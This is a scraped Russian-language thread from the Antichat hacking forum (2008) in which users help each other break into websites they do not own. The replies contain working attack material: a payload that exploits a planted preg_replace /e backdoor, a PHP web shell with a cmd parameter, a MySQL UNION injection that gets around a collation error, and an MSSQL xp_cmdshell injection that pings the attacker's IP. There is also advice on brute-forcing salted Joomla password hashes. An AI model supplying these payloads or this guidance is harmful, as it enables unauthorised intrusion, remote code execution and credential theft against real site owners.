Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.11.2008, 03:05
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
SELECT ..... UNHEX(HEX(pole).... FROM ...
|
|
|
13.11.2008, 05:54
|
|
Banned
Регистрация: 08.08.2008
Сообщений: 1
Провел на форуме:
35086
Репутация:
11
|
|
Сообщение от truelamer
если ты не заметил то тут джумла с солью и hashcracking.info не поможет
Онлайн ломалку не найдешь, юзай брутеры с алгоритмом md5($pass.$sault) к примеру passwordspro
Последний раз редактировалось Модный; 13.11.2008 в 05:56..
|
|
|
|
13.11.2008, 12:29
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Здравствуйте! 
Подскажите,
есть код внедренный в .php файл на сервере:
Код:
if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
подскажите, как его правильно использовать?
Т.е. как правильно передать несколько строк php в него, чтобы они выполнились?
Спасибо! |
|
|
|
13.11.2008, 12:29
|
|
Banned
Регистрация: 09.11.2008
Сообщений: 4
Провел на форуме:
36924
Репутация:
-9
|
|
Сообщение от Tigger
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' - не помню, как обойти(( помогите, пожалуйста!!!
Код:
1+union+select+convert(pole)+using+latin1),+from+table/*
|
|
|
|
13.11.2008, 12:32
|
|
Banned
Регистрация: 09.11.2008
Сообщений: 4
Провел на форуме:
36924
Репутация:
-9
|
|
Сообщение от fervex
Здравствуйте!
Подскажите,
есть код внедренный в .php файл на сервере:
Код:
if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
подскажите, как его правильно использовать?
Т.е. как правильно передать несколько строк php в него, чтобы они выполнились?
Спасибо!
Код:
index.php?id4=123&act=phpinfo();
Последний раз редактировалось 9()K_t()R; 13.11.2008 в 13:11..
|
|
|
|
13.11.2008, 12:47
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Сообщение от 9()K_t()R
Код:
index.php?id4=123&act=phpinfo();
or
Код:
index.php?act=123&id4=phpinfo();
работает!
php_inj.php?id4=5567&act=phpinfo();
Код:
if(isset($_REQUEST['act']) and isset($_REQUEST['id4'])) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
а какой код нужен, чтобы шелл залить?
Последний раз редактировалось fervex; 13.11.2008 в 12:53..
|
|
|
|
13.11.2008, 13:13
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
fervex
'<?system($_GET[cmd]);?>'
Можешь захексить (ну и если с кавычками в порядке)
потом обращаешься к нему
/shell.php?cmd=ls -la
Только найди диреторию drwxrwxrwx =) temp or tmp search
|
|
|
|
13.11.2008, 18:47
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера.
Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура.
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
|
|
|
|
13.11.2008, 19:10
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера.
Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура.
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
помотри можно-ли выполнить консольные команды, если можно то настрой firewall и пингани себя.
http://site.com/script.asp?id=1';exec master..xp_cmdshell 'ping -a твойip'--
Последний раз редактировалось truelamer; 13.11.2008 в 19:25..
|
|
|
|
13.11.2008, 19:22
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
не думаю, что SQL сервер будет доступен из веб...
SELECT HOST_NAME()
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
